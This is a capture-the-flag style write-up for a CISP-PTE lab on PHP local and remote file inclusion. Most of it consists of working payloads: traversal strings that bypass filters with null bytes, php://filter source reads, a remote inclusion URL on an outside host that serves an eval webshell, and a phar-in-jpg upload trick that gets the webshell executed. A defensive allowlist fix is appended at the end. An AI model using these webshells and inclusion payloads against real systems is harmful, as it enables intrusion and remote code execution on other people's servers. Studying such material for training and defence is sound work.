2022 CISP-PTE (I): File inclusion
2022-06-27 06:36:00 【A τθ】
I. Local file inclusion (basics)
1. The first one
2. The second one
....//....//flag.txt
3. The third one
....//....//flag.txt%00
4. The fourth one
....//....//....//flag.txt%00
II. Local file inclusion (practice)
1. The first one
php://filter/convert.base64-encode/resource=../key.php
2. The second one
2.1 Check the source code of the answer page
Checking the source code of the answer page reveals no useful information.
Access the view.html file directly and look at its source code.
2.2 Pass in the parameter
2.3 View source code
III. Remote file inclusion (practice)
1. The first one
1.1 Open the question
1.2 Initial attempt
1.3 Remote file inclusion
Truncation does not work, so switch to remote file inclusion.
1.4 Connect with AntSword
http://49.235.78.245:1117/start/index.php?page=http://49.235.78.245/1
2. Start a remote server locally
2.1 Put a one-line webshell in the user directory
1.txt
<?php @eval($_POST['c']);?>
Directory:
C:\Users\Administrator
2.2 Start the server
With python3, run: python3 -m http.server
With python2, run: python2 -m SimpleHTTPServer
2.3 Success
http://192.168.1.107:8000/1.txt
3. The second one
3.1 View the question source code
3.2 Read the source code of include.php and upload.php
php://filter/convert.base64-encode/resource=include
include.php:
<html>
Tips: the parameter is file! :)
<!-- upload.php -->
</html>
<?php
@$file = $_GET["file"];
if (isset($file))
{
    if (preg_match('/http|data|ftp|input|%00/i', $file) || strstr($file, "..") !== FALSE || strlen($file) >= 70)
    {
        echo "<p> error! </p>";
    }
    else
    {
        include($file.'.php');
    }
}
?>
upload.php:
<form action="" enctype="multipart/form-data" method="post"
name="upload">file:<input type="file" name="file" /><br>
<input type="submit" value="upload" /></form>
<?php
if (!empty($_FILES["file"]))
{
    echo $_FILES["file"];
    $allowedExts = array("gif", "jpeg", "jpg", "png");
    @$temp = explode(".", $_FILES["file"]["name"]);
    $extension = end($temp);
    if (((@$_FILES["file"]["type"] == "image/gif") || (@$_FILES["file"]["type"] == "image/jpeg")
        || (@$_FILES["file"]["type"] == "image/jpg") || (@$_FILES["file"]["type"] == "image/pjpeg")
        || (@$_FILES["file"]["type"] == "image/x-png") || (@$_FILES["file"]["type"] == "image/png"))
        && (@$_FILES["file"]["size"] < 102400) && in_array($extension, $allowedExts))
    {
        move_uploaded_file($_FILES["file"]["tmp_name"], "upload/" . $_FILES["file"]["name"]);
        echo "file upload successful!Save in: " . "upload/" . $_FILES["file"]["name"];
    }
    else
    {
        echo "upload failed!";
    }
}
?>
3.3 Upload the file
180.php:
<?php @eval($_POST['c']);?>
1. Write the one-line webshell into 180.php;
2. Compress 180.php into 180.zip;
3. Rename 180.zip to 180.jpg.
3.4 Read the file
?file=phar://upload/180.jpg/180
c=phpinfo();
3.5 Connect with AntSword
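The blacklist in include.php rejects http, data, ftp, input, %00 and "..", yet the php://filter and phar:// values used above pass it because neither string is on the list. An allowlist-based replacement for that check follows, added here as an example and not part of the original challenge code; the page names in PAGES and the pages/ directory are assumptions.

```php
<?php
// Added example: allowlist lookup instead of the blacklist regex in include.php.
// PAGES and PAGES_DIR are hypothetical; adapt them to the real application.
declare(strict_types=1);

const PAGES_DIR = __DIR__ . '/pages';
const PAGES = ['home' => 'home.php', 'about' => 'about.php'];

// Defence in depth: drop the phar:// wrapper if the application does not need it.
if (in_array('phar', stream_get_wrappers(), true)) {
    stream_wrapper_unregister('phar');
}

function resolve_page(?string $name): ?string
{
    // Only exact keys map to files. Stream wrappers (php://, phar://),
    // "....//" sequences and %00 suffixes can never match a key.
    if ($name === null || !array_key_exists($name, PAGES)) {
        return null;
    }
    $base = realpath(PAGES_DIR);
    $path = realpath(PAGES_DIR . '/' . PAGES[$name]);
    if ($base === false || $path === false) {
        return null;
    }
    // The resolved file must sit inside PAGES_DIR (catches symlinked entries).
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// ?file[]=x arrives as an array, so accept strings only.
$file = $_GET['file'] ?? null;
$path = is_string($file) ? resolve_page($file) : null;

if ($path === null) {
    http_response_code(404);
    echo '<p> error! </p>';
} else {
    // The included path comes from the constant table, never from the request.
    include $path;
}
```

Keeping allow_url_include off in php.ini closes the remote file inclusion path regardless of application code.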